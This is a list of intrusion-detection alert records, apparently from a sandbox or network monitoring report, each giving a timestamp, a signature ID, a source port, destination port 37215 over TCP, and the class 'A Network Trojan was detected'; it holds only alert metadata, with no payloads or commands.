                Timestamp:05/29/24-15:15:14.369322
                SID:2829579
                Source Port:39184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.454180
                SID:2835222
                Source Port:60030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984485
                SID:2829579
                Source Port:37096
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463097
                SID:2835222
                Source Port:51418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.609525
                SID:2829579
                Source Port:34780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.891247
                SID:2829579
                Source Port:40584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917188
                SID:2835222
                Source Port:57570
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660895
                SID:2829579
                Source Port:38418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664421
                SID:2835222
                Source Port:47734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.913045
                SID:2829579
                Source Port:51490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537088
                SID:2835222
                Source Port:53254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.567224
                SID:2835222
                Source Port:58494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.738957
                SID:2829579
                Source Port:50350
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.784923
                SID:2835222
                Source Port:35986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.881774
                SID:2829579
                Source Port:50212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277632
                SID:2835222
                Source Port:46306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790874
                SID:2829579
                Source Port:41884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074800
                SID:2835222
                Source Port:46612
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076174
                SID:2835222
                Source Port:45560
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184504
                SID:2829579
                Source Port:42544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.610875
                SID:2835222
                Source Port:60120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730399
                SID:2835222
                Source Port:51666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136858
                SID:2829579
                Source Port:58410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.537524
                SID:2835222
                Source Port:47338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873138
                SID:2829579
                Source Port:56920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675241
                SID:2829579
                Source Port:57940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166936
                SID:2835222
                Source Port:38400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.335347
                SID:2829579
                Source Port:50190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227244
                SID:2829579
                Source Port:58548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335029
                SID:2829579
                Source Port:42428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339271
                SID:2835222
                Source Port:52430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.729055
                SID:2835222
                Source Port:43126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.730758
                SID:2835222
                Source Port:51336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.168701
                SID:2835222
                Source Port:39320
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.372057
                SID:2829579
                Source Port:45706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273917
                SID:2829579
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846400
                SID:2829579
                Source Port:39078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867758
                SID:2829579
                Source Port:53470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215717
                SID:2835222
                Source Port:56952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.223081
                SID:2829579
                Source Port:43344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.318426
                SID:2829579
                Source Port:53226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436218
                SID:2829579
                Source Port:51480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779863
                SID:2835222
                Source Port:35900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805970
                SID:2835222
                Source Port:49122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325431
                SID:2835222
                Source Port:60226
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437684
                SID:2835222
                Source Port:51432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.628733
                SID:2835222
                Source Port:48842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977930
                SID:2835222
                Source Port:45946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.292920
                SID:2835222
                Source Port:43574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.840130
                SID:2835222
                Source Port:35162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.443083
                SID:2829579
                Source Port:36844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507271
                SID:2835222
                Source Port:44408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166237
                SID:2835222
                Source Port:36712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766264
                SID:2829579
                Source Port:49828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.586727
                SID:2835222
                Source Port:52996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.287286
                SID:2829579
                Source Port:48410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.733055
                SID:2835222
                Source Port:53480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.614110
                SID:2829579
                Source Port:42220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620631
                SID:2835222
                Source Port:55884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.289115
                SID:2829579
                Source Port:60478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.617014
                SID:2829579
                Source Port:53748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611448
                SID:2835222
                Source Port:41912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781236
                SID:2835222
                Source Port:42448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.850434
                SID:2829579
                Source Port:42558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773515
                SID:2835222
                Source Port:47806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.851534
                SID:2835222
                Source Port:35390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436590
                SID:2835222
                Source Port:52680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873581
                SID:2835222
                Source Port:57842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848795
                SID:2835222
                Source Port:49002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002252
                SID:2829579
                Source Port:59870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.230450
                SID:2835222
                Source Port:40812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782685
                SID:2835222
                Source Port:34836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.783762
                SID:2835222
                Source Port:60614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689218
                SID:2829579
                Source Port:49192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.132854
                SID:2829579
                Source Port:33512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.262484
                SID:2835222
                Source Port:45842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.787008
                SID:2835222
                Source Port:56800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135493
                SID:2835222
                Source Port:48302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136982
                SID:2829579
                Source Port:43058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394775
                SID:2829579
                Source Port:51818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336123
                SID:2829579
                Source Port:39666
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.039688
                SID:2835222
                Source Port:48154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.565970
                SID:2835222
                Source Port:35484
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685830
                SID:2835222
                Source Port:55008
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946305
                SID:2829579
                Source Port:34494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558306
                SID:2829579
                Source Port:58162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868201
                SID:2835222
                Source Port:41850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908174
                SID:2835222
                Source Port:60724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.560825
                SID:2835222
                Source Port:45236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.848380
                SID:2835222
                Source Port:37478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032687
                SID:2835222
                Source Port:59482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.858626
                SID:2829579
                Source Port:43516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066713
                SID:2829579
                Source Port:60436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.814629
                SID:2835222
                Source Port:45840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.031421
                SID:2829579
                Source Port:58446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.818373
                SID:2835222
                Source Port:39924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909895
                SID:2835222
                Source Port:51494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060992
                SID:2829579
                Source Port:35310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993566
                SID:2835222
                Source Port:41774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.917630
                SID:2835222
                Source Port:35728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023423
                SID:2829579
                Source Port:38810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228239
                SID:2835222
                Source Port:53174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465302
                SID:2835222
                Source Port:59234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272601
                SID:2829579
                Source Port:41596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.916112
                SID:2829579
                Source Port:51370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.360323
                SID:2829579
                Source Port:45856
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440915
                SID:2829579
                Source Port:46700
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576000
                SID:2835222
                Source Port:49842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.974374
                SID:2835222
                Source Port:36734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.621014
                SID:2829579
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822052
                SID:2835222
                Source Port:56016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.983006
                SID:2835222
                Source Port:49656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.233231
                SID:2829579
                Source Port:45672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.435816
                SID:2835222
                Source Port:36994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.441035
                SID:2835222
                Source Port:49998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.455062
                SID:2835222
                Source Port:58970
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.610319
                SID:2835222
                Source Port:42508
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.261730
                SID:2835222
                Source Port:41574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.740102
                SID:2829579
                Source Port:42424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015029
                SID:2835222
                Source Port:44942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975885
                SID:2829579
                Source Port:52148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916821
                SID:2835222
                Source Port:53130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.876252
                SID:2829579
                Source Port:53822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:26.002225
                SID:2829579
                Source Port:55428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.879469
                SID:2835222
                Source Port:38166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737495
                SID:2835222
                Source Port:59232
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630317
                SID:2835222
                Source Port:34680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.877906
                SID:2829579
                Source Port:50900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.597435
                SID:2829579
                Source Port:54620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.826242
                SID:2829579
                Source Port:56810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.865514
                SID:2829579
                Source Port:46128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.417987
                SID:2835222
                Source Port:59610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.065312
                SID:2829579
                Source Port:44202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.944668
                SID:2835222
                Source Port:35164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652815
                SID:2829579
                Source Port:58078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.568979
                SID:2835222
                Source Port:34606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.110712
                SID:2835222
                Source Port:42958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.971435
                SID:2829579
                Source Port:49992
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.959682
                SID:2835222
                Source Port:58518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.848718
                SID:2835222
                Source Port:52340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.364437
                SID:2835222
                Source Port:45402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790715
                SID:2835222
                Source Port:41968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.227130
                SID:2835222
                Source Port:38404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.037404
                SID:2829579
                Source Port:54552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.979734
                SID:2829579
                Source Port:47470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.165934
                SID:2829579
                Source Port:53636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421800
                SID:2835222
                Source Port:51446
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.781686
                SID:2835222
                Source Port:57292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.572603
                SID:2829579
                Source Port:47292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277108
                SID:2829579
                Source Port:47580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359555
                SID:2835222
                Source Port:38068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728631
                SID:2835222
                Source Port:57432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.992843
                SID:2829579
                Source Port:50604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559168
                SID:2835222
                Source Port:45906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899713
                SID:2835222
                Source Port:39138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264523
                SID:2829579
                Source Port:60004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.981257
                SID:2835222
                Source Port:47712
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175206
                SID:2829579
                Source Port:49430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918516
                SID:2835222
                Source Port:46190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.170525
                SID:2829579
                Source Port:39996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.732775
                SID:2829579
                Source Port:44264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226046
                SID:2835222
                Source Port:50080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.008313
                SID:2835222
                Source Port:58036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.177725
                SID:2829579
                Source Port:57474
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631581
                SID:2829579
                Source Port:38572
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.037013
                SID:2835222
                Source Port:40380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793908
                SID:2835222
                Source Port:37618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665437
                SID:2829579
                Source Port:37010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.333594
                SID:2829579
                Source Port:46940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331345
                SID:2829579
                Source Port:55832
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.022843
                SID:2835222
                Source Port:45280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075061
                SID:2835222
                Source Port:48084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.784818
                SID:2835222
                Source Port:40652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583340
                SID:2835222
                Source Port:48120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.419409
                SID:2829579
                Source Port:42880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.659869
                SID:2829579
                Source Port:35980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721102
                SID:2835222
                Source Port:41500
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905156
                SID:2829579
                Source Port:37762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.653002
                SID:2835222
                Source Port:50402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210582
                SID:2835222
                Source Port:33102
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789393
                SID:2829579
                Source Port:54846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140932
                SID:2829579
                Source Port:46450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868269
                SID:2835222
                Source Port:36040
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868472
                SID:2835222
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.650019
                SID:2829579
                Source Port:55632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.714494
                SID:2835222
                Source Port:35926
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.733675
                SID:2829579
                Source Port:55850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559158
                SID:2835222
                Source Port:40214
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.034755
                SID:2829579
                Source Port:36114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.432338
                SID:2829579
                Source Port:33728
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265855
                SID:2835222
                Source Port:48716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.782526
                SID:2829579
                Source Port:57640
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.654774
                SID:2829579
                Source Port:54754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284181
                SID:2829579
                Source Port:57094
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956181
                SID:2829579
                Source Port:53396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.325386
                SID:2835222
                Source Port:47900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362788
                SID:2835222
                Source Port:43406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681961
